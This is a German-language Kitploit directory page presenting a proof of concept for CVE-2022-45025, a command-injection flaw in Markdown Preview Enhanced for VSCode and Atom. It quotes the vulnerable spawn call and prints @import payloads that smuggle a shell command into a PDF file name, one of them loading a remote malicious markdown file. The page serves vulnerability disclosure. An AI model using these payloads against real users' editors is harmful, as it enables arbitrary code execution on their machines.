Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-45025 — [PoC] Befehlsinjektion durch PDF-Import in Markdown Preview Enhanced (VSCode, Atom) | Kitploit
Tools/GitHubGitHub/yuriisanin/cve-2022-45025
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubyuriisanin/cve-2022-45025

CVE-2022-45025

[PoC] Befehlsinjektion durch PDF-Import in Markdown Preview Enhanced (VSCode, Atom)

Repository anzeigen
8817vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-45025

Befehlsinjektion über PDF-Import in Markdown Preview Enhanced (VSCode, Atom)

Beschreibung

Die Markdown-Tool-Bibliothek Mume war anfällig für Befehlsinjektion, da der Befehl spawn mit der Option {shell: true} verwendet wurde. Dies könnte es einem Angreifer ermöglichen, beliebigen Code auszuführen, indem er das Opfer dazu verleitet, eine speziell präparierte Markdown-Datei mit VSCode oder Atom zu öffnen. Das Markdown-Preview-Enhanced-Plugin für VSCode und Atom basiert auf dieser Bibliothek.

Verwundbarer Code-Ausschnitt:

root@kitploit:~
const task = spawn(
      "pdf2svg",
      [
        `"${pdfFilePath}"`,
        `"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
        "all",
      ],
      { shell: true },
    )

Proof of Concept

Das folgende Markdown-Dokument ermöglicht einem Angreifer, beliebige Befehle auszuführen:

root@kitploit:~
@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"

The following comment will be recognised by MPE as valid "@import" command:

<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->

Alternativ kann die Payload aus einer externen Quelle ausgeführt werden:

root@kitploit:~
<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->

DEMO sowohl für VSCode als auch für Atom auf YouTube.

vscode-rce-poc-gif

Support

Du kannst mir auf Twitter, GitHub oder YouTube folgen.

Tool herunterladen